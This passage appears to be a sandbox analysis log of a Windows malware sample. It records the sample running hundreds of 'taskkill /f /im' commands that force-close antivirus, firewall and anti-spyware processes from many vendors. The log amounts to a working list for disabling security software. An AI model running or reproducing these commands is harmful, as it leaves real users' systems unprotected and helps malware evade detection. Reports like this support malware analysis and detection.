C:\Windows\SysWOW64\taskkill.exetaskkill /f /im realmon.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGUARD.exe4⤵PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGCtrl.exe4⤵PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CSS_1630.exe4⤵
- Kills process with taskkill
PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CSS-AVS.exe4⤵PID:1140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ashdisp.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ashmaisv.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ashserv.exe4⤵PID:1668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ashwebsv.exe4⤵PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM aswupdsv.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGCC.exe4⤵PID:1600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGCC32.exe4⤵PID:928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGEmc.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGServ.exe4⤵
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AVGServ9.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Avgw.exe4⤵
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vsserv.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ewidoguard.exe4⤵PID:992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ewidoctrl.exe4⤵PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM kav.exe4⤵PID:1788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM kavsvc.exe4⤵PID:756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MPFAgent.exe4⤵PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MPFTray.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Mscifapp.exe4⤵PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM MSKSrvr.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM NOD32Krn.exe4⤵PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM NOD32Kui.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PavPrS9x.exe4⤵PID:692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM NPFMntor.exe4⤵PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Nprotect.exe4⤵PID:1592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Nsched32.exe4⤵PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SymWSC.exe4⤵PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM SpywareStrike.exe /IM SpywareStrike.exe4⤵PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE4⤵PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM symlcsvc.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe4⤵PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM zlclient.exe /IM zonealarm.exe4⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM ewidoctrl.exe4⤵PID:1628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe4⤵
- Kills process with taskkill
PID:308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe4⤵PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM kavsvc.exe /IM kav.exe4⤵PID:684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe4⤵PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE4⤵PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe4⤵PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM DefWatch.exe /IM Rtvscan.exe4⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM avgamsvr.exe /IM avgupsvc.exe4⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32krn.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nod32.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kav.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kavmm.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgemc.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc.exe4⤵PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgamsvr.exe4⤵PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgupsvc.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe4⤵PID:1660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashwebsv.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashdisp.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashmaisv.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashserv.exe4⤵PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ashwebsv.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aswupdsv.exe4⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ewidoctrl.exe4⤵PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guard.exe4⤵PID:1932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gcasdtserv.exe4⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msmpeng.exe4⤵PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcafee.exe4⤵PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghml.exe4⤵PID:1592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msiexec.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outpost.exe4⤵PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im isafe.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im minilog.exe4⤵PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zlclient.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im updclient.exe4⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe4⤵PID:1628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navw32.exe4⤵PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im norton.exe4⤵PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im navapsvc.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccsetmgr.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cccproxy.exe4⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccapp.exe4⤵
- Kills process with taskkill
PID:1072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccevtmgr.exe4⤵
- Kills process with taskkill
PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im npfmntor.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im logexprt.exe4⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nisum.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im issvc.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpdclnt.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavprsrv.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im pavprot.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avengine.exe4⤵
- Kills process with taskkill
PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webproxy.exe4⤵PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avguard.exe4⤵PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgnt.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im shed.exe4⤵
- Kills process with taskkill
PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe4⤵PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sccomm.exe4⤵PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spiderml.exe4⤵PID:1788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sgmain.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spywareguard.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kpf4gui.exe4⤵
- Kills process with taskkill
PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im kpf4ss.exe4⤵PID:1072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcdash.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcdetect.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcregwiz.exe4⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mcinfo.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mghtml.exe4⤵
- Kills process with taskkill
PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oasclnt.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfagent.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfconsole.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfservice.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpftray.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mpfwizard.exe4⤵PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mvtx.exe4⤵
- Kills process with taskkill
PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avp32.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avpcc.exe4⤵PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im _avpm.exe4⤵PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ackwin32.exe4⤵PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im advxdwin.exe4⤵PID:1788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agentsvr.exe4⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im agv.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ahnsd.exe4⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im alertsvc.exe4⤵PID:1072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im alogserv.exe4⤵
- Kills process with taskkill
PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amon.exe4⤵PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amon9x.exe4⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im amonavp32.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im anti -trojan.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antivir.exe4⤵PID:1204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antivirus.exe4⤵PID:928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ants.exe4⤵PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im antssircam.exe4⤵PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apimonitor.exe4⤵PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im aplica32.exe4⤵
- Kills process with taskkill
PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im apvxdwin.exe4⤵PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atcon.exe4⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atguard.exe4⤵PID:308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ats.exe4⤵PID:1292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atscan.exe4⤵
- Kills process with taskkill
PID:756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atupdater.exe4⤵PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im atwatch.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autodown.exe4⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autotrace.exe4⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im autoupdate.exe4⤵PID:552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avconsol.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ave32.exe4⤵PID:692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgcc32.exe4⤵PID:2016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgctrl.exe4⤵PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv.exe4⤵PID:1916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv9.exe4⤵
- Kills process with taskkill
PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgserv9schedapp.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avgw.exe4⤵PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkpop.exe4⤵PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkserv.exe4⤵PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkservice.exe4⤵
- Kills process with taskkill
PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkwcl9.exe4⤵PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avkwctl9.exe4⤵PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avnt.exe4⤵PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avp.exe4⤵PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avp32.exe4⤵PID:360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpcc.exe4⤵PID:1648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im AVPCC Service.exe4⤵PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpccavpm.exe4⤵PID:1840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpdos32.exe4⤵PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpexec.exe4⤵PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpinst.exe4⤵PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpm.exe4⤵PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpmonitor.exe4⤵PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avptc.exe4⤵PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avptc32.exe4⤵
- Kills process with taskkill
PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpupd.exe4⤵PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avpupdates.exe4⤵PID:1992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avrescue.exe4⤵PID:1092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsched32.exe4⤵PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avsynmgr.exe4⤵
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwin95.exe4⤵
- Kills process with taskkill
PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwinnt.exe4⤵PID:1844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avwupd32.exe4⤵PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxgui.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxinit.exe4⤵PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxlive.exe4⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxmonitor9x.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxmonitornt.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxnews.exe4⤵PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxquar.exe4⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxsch.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im avxw.exe4⤵PID:1088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BACKLOG.exe4⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bd_professional.exe4⤵PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bidef.exe4⤵PID:1100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bidserver.exe4⤵PID:1600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bipcp.exe4⤵
- Kills process with taskkill
PID:996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bisp.exe4⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackd.exe4⤵PID:1108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackice.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im blackiceblackd.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im BootWarn.exe4⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im borg2.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bs120.exe4⤵PID:1988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im bullguard.exe4⤵PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccApp.exe4⤵PID:360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccevtmgr.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccIMScan.exe4⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccPwdSrc.exe4⤵PID:924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccpxysvc.exe4⤵PID:1932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ccSetMgr.exe4⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cdp.exe4⤵PID:1668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cfiadmin.exe4⤵
- Kills process with taskkill
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cfiaudit.exe4⤵PID:776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cfinet.exe4⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cfinet32.exe4⤵PID:1596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im claw95.exe4⤵PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im claw95cf.exe4⤵PID:1528
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im clean.exe4⤵PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cleaner.exe4⤵PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cleaner3.exe4⤵PID:1320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cleanpc.exe4⤵PID:604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmgrdian.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cmon016.exe4⤵PID:1240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im codered.exe4⤵PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im connectionmonitor.exe4⤵PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conseal.exe4⤵PID:900
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpd.exe4⤵PID:2036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im cpf9x206.exe4⤵PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctrl.exe4⤵PID:1412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im defalert.exe4⤵
- Kills process with taskkill
PID:1220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im defence.exe4⤵PID:1208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im defense.exe4⤵PID:1592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im defscangui.exe4⤵PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im defwatch.exe4⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im deputy.exe4⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im doors.exe4⤵
- Kills process with taskkill
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dpf.exe4⤵PID:1212
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im drwatson.exe4⤵PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im drweb32.exe4⤵PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dvp95.exe4⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dvp95_0.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ecengine.exe4⤵PID:992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im edisk.exe4⤵PID:952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im efpeadm.exe4⤵PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im esafe.exe4⤵PID:1416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im escanh95.exe4⤵
- Kills process with taskkill
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im escanhnt.exe4⤵PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im escanv95.exe4⤵PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im espwatch.exe4⤵PID:540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im etrustcipe.exe4⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im evpn.exe4⤵PID:1668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im exantivirus -cnet.exe4⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fameh32.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fast.exe4⤵PID:476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fch32.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fih32.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im findviru.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im firewall.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fix-it.exe4⤵PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im flowprotector.exe4⤵PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fnrb32.exe4⤵PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fp -win.exe4⤵PID:888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fp -win_trial.exe4⤵PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fprot.exe4⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im frw.exe4⤵PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsaa.exe4⤵PID:1504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsav32.exe4⤵PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsav95.exe4⤵PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsave32.exe4⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsgk32.exe4⤵PID:1680
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsm32.exe4⤵PID:1932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsma32.exe4⤵PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fsmb32.exe4⤵
- Kills process with taskkill
PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fwenc.exe4⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gbmenu.exe4⤵PID:324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gbpoll.exe4⤵PID:476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im gedit.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im generics.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im grief3878.exe4⤵PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guard.exe4⤵PID:828
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im guarddog.exe4⤵PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im HackerEliminator.exe4⤵PID:1744
-
-
